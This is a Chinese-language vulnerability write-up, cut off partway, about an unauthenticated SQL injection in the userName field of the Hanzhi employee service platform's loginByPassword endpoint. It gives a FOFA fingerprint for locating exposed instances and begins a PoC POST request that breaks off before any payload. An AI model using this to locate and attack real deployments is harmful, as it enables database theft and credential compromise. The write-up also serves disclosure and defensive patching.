0x01 产品简介
翰智员工服务平台以其全天候、全场景、全渠道的服务特点,结合先进的智能技术,为企业提供了一套高效、便捷的员工服务解决方案。通过该平台,企业可以实现对员工全生命周期的管理,提升员工满意度和敬业度,同时降低运营成本,提高管理效率。成功应用于多个大型企业,如雅居乐、南方航空等,帮助企业实现了财务人力双共享、管理升级、提高员工满意度及敬业度等目标。
0x02 漏洞概述
由于翰智员工服务平台登录接口 loginByPassword 处userName字段未对传入的数据进行严格校验和过滤,直接带入到数据库执行,导致造成SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,获取有效凭证及口令,使系统处于极不安全的状态。
0x03 复现环境
FOFA:body="./static/hrfonts/iconfont.css"
0x04 漏洞复现
PoC
POST /hrssc/portal/plantform/loginByPassword HTTP/1.1
Host: your-ip
User-Agent: Mozil